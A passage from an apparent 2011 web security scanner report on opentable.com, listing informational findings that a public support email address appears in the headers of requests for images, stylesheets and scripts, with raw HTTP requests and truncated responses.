Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:53:35 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; domain=.opentable.com; path=/
Vary: Accept-Encoding
Content-Length: 64483

document.write("<link href=\"http://www.opentable.com/frontdoor/css/ot_short.css?v=Web_11_10_0_11.prod.com\" rel=\"styleSheet\" type=\"text/css\" /><!--[if IE]><link type=\"text/css\" href=\"http://ww
...[SNIP]...

8.9. http://www.opentable.com/frontdoor/img/downarrow_gray.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/img/downarrow_gray.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /frontdoor/img/downarrow_gray.gif HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref

Response

HTTP/1.1 200 OK
Content-Length: 731
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:08:54 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:39 GMT

GIF89a........................................................................................7............................................8........YC,.........C*....8...........xfT..................B
...[SNIP]...

8.10. http://www.opentable.com/frontdoor/img/icons_final_dark.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/img/icons_final_dark.png

Issue detail

The following email address was disclosed in the response:

Request

GET /frontdoor/img/icons_final_dark.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref

Response

HTTP/1.1 200 OK
Content-Length: 2078
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:08:54 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:38 GMT

.PNG
.
...IHDR...<..........{......tEXtSoftware.Adobe ImageReadyq.e<....IDATx...L.G..w........p..X.c.%.
.RS.    .....4%...!M#i.ilbIckL4i..@......6..?Z#)J../.._.{xwt.8...l.s....d.;3o....3.f.....
...[SNIP]...

8.11. http://www.opentable.com/frontdoor/img/ot_btn_black.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/img/ot_btn_black.png

Issue detail

The following email address was disclosed in the response:

Request

GET /frontdoor/img/ot_btn_black.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref

Response

HTTP/1.1 200 OK
Content-Length: 3039
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:08:54 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:39 GMT

.PNG
.
...IHDR.......E.....E..i...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

8.12. http://www.opentable.com/frontdoor/js/jquery-ui/css/custom-theme/images/ui-bg_flat_75_ffffff_40x100.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/js/jquery-ui/css/custom-theme/images/ui-bg_flat_75_ffffff_40x100.png

Issue detail

The following email address was disclosed in the response:

Request

GET /frontdoor/js/jquery-ui/css/custom-theme/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 200 OK
Content-Length: 178
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:08:56 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:43 GMT

.PNG
.
...IHDR...(...d......drz...yIDATh...1.. ...R...    .7..(..........V..`%X    V..`%X    V..`%X    V..`%X    V..`%X    V..`%X    V..`%X    V..`%X    V..`%X    V..`%X    V..`%X    V..`%X    V.j...)2.N....IEND.B`.

8.13. http://www.opentable.com/frontdoor/js/jquery-ui/css/custom-theme/jquery-ui-1.8.5.custom.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/js/jquery-ui/css/custom-theme/jquery-ui-1.8.5.custom.css

Issue detail

The following email address was disclosed in the response:

Request

GET /frontdoor/js/jquery-ui/css/custom-theme/jquery-ui-1.8.5.custom.css HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 200 OK
Content-Length: 25347
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:30 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:40 GMT

.ui-helper-hidden{display:none;}.ui-helper-hidden-accessible{position:absolute;left:-99999999px;}.ui-helper-reset{margin:0;padding:0;border:0;outline:0;line-height:1.3;text-decoration:none;font-size:1
...[SNIP]...

8.14. http://www.opentable.com/frontdoor/js/jquery-ui/jquery-ui-1.8.11.custom.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/js/jquery-ui/jquery-ui-1.8.11.custom.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /frontdoor/js/jquery-ui/jquery-ui-1.8.11.custom.min.js HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 200 OK
Content-Length: 199428
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:52 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:40 GMT

(function(c,j){function k(a){return!c(a).parents().andSelf().filter(function(){return c.curCSS(this,"visibility")==="hidden"||c.expr.filters.hidden(this)}).length}c.ui=c.ui||{};if(!c.ui.version){c.ext
...[SNIP]...

8.15. http://www.opentable.com/frontdoor/js/jquery-ui/jquery.scrollTo-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/js/jquery-ui/jquery.scrollTo-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /frontdoor/js/jquery-ui/jquery.scrollTo-min.js HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 200 OK
Content-Length: 1933
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:54 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:42 GMT

(function(d){var k=d.scrollTo=function(a,i,e){d(window).scrollTo(a,i,e)};k.defaults={axis:"xy",duration:parseFloat(d.fn.jquery)>=1.3?0:1};k.window=function(a){return d(window)._scrollable()};d.fn._scr
...[SNIP]...

8.16. http://www.opentable.com/httphandlers/MetroData.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /httphandlers/MetroData.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /httphandlers/MetroData.aspx?m=4&mc=US&v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:58 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 13631

var OTLOOKUP_METROS = new Hash({45:[45,'Alabama',[33.4886090,-86.7568810]],331:[331,'Amsterdam',[52.3765710,4.9071000]],212:[212,'Anchorage',[61.2175750,-149.8877980]],95:[95,'Arkansas',[35.2142097,-9
...[SNIP]...

8.17. http://www.opentable.com/img/borders/modules/all-corners.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/all-corners.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/all-corners.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 7584
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:57 GMT

.PNG
.
...IHDR....................    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

8.18. http://www.opentable.com/img/borders/modules/ot_borders_noshadow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/ot_borders_noshadow.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/ot_borders_noshadow.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 84
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:40 GMT

GIF89a...............................!.......,...........H.,3..)...........HR..]Y..;

8.19. http://www.opentable.com/img/borders/modules/ot_borders_noshadow_green.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/ot_borders_noshadow_green.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/ot_borders_noshadow_green.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 49
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:38 GMT

GIF89a.........v...!.......,...........D......+.;

8.20. http://www.opentable.com/img/borders/modules/ot_borders_promos_noshadow.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/ot_borders_promos_noshadow.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/ot_borders_promos_noshadow.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3591
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:39 GMT

.PNG
.
...IHDR................7...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

8.21. http://www.opentable.com/img/borders/modules/ot_box_noshadow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/ot_box_noshadow.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/ot_box_noshadow.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1585
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:34 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:51 GMT

GIF89a=.K......{....................................................................................................|..................................................................................
...[SNIP]...

8.22. http://www.opentable.com/img/borders/modules/ot_box_noshadow_green.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/ot_box_noshadow_green.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/ot_box_noshadow_green.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 505
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:50 GMT

.PNG
.
...IHDR...=...K.......XE...0PLTE..~........................................v..........tRNS.................#]....hIDATx....i.P.EQ.$.(H..a...... ..,..Eg.
i.b%$..2.......s&........]....d.....
...[SNIP]...

8.23. http://www.opentable.com/img/borders/modules/ot_box_promos_noshadow.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/ot_box_promos_noshadow.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/ot_box_promos_noshadow.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 493
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:51 GMT

.PNG
.
...IHDR...)...?............6PLTE.......................................................r*r....tRNS....0J...dIDATx...9r.P.C....I..Y..TFJ..'@..P..S.......j[..x...q.kk5.>....|..awb....S.....OU
...[SNIP]...

8.24. http://www.opentable.com/img/borders/modules/ot_box_white_noshadow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/ot_box_white_noshadow.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/ot_box_white_noshadow.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 796
Content-Type: image/gif
